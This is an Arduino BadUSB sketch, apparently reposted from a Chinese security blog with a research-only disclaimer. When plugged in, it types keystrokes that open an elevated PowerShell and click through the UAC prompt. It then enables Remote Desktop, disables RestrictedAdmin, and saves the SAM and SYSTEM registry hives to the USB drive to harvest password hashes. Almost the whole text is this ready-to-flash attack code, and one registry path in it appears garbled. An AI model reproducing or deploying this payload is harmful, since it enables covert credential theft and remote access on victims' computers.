#include <Keyboard.h>void setup() {// put your setup code here, to run once:Keyboard.begin();delay(1000);Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);delay(500);Keyboard.press(KEY_LEFT_GUI);delay(500);Keyboard.press('r');delay(500);Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r');delay(500);Keyboard.println("cmd");delay(500);Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);delay(500);Keyboard.println("powershell.exe -command start-process powershell -verb runAs && exit");Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);delay(500);Keyboard.press(KEY_LEFT_ARROW);Keyboard.println(KEY_LEFT_ARROW);Keyboard.press(KEY_LEFT_ARROW);Keyboard.release(KEY_LEFT_ARROW);delay(1000);Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);delay(1000);Keyboard.println("");Keyboard.println("REG ADD HKLM\SYSTEM\CurrentControlSet\Control\RCMD\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f");delay(500);Keyboard.println("REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f");delay(500);Keyboard.println("$usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.DriveType -eq 2 } | Select-Object -ExpandProperty DriveLetter;");delay(500);Keyboard.println("reg save hklm\sam $usbDrive\sam.hive");delay(500);Keyboard.println("reg save hklm\system $usbDrive\system.hive");Keyboard.println("exit");Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.end();}void loop() {// put your main code here, to run repeatedly:}
原文始发于微信公众号(yudays实验室):给badusb升级一下
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论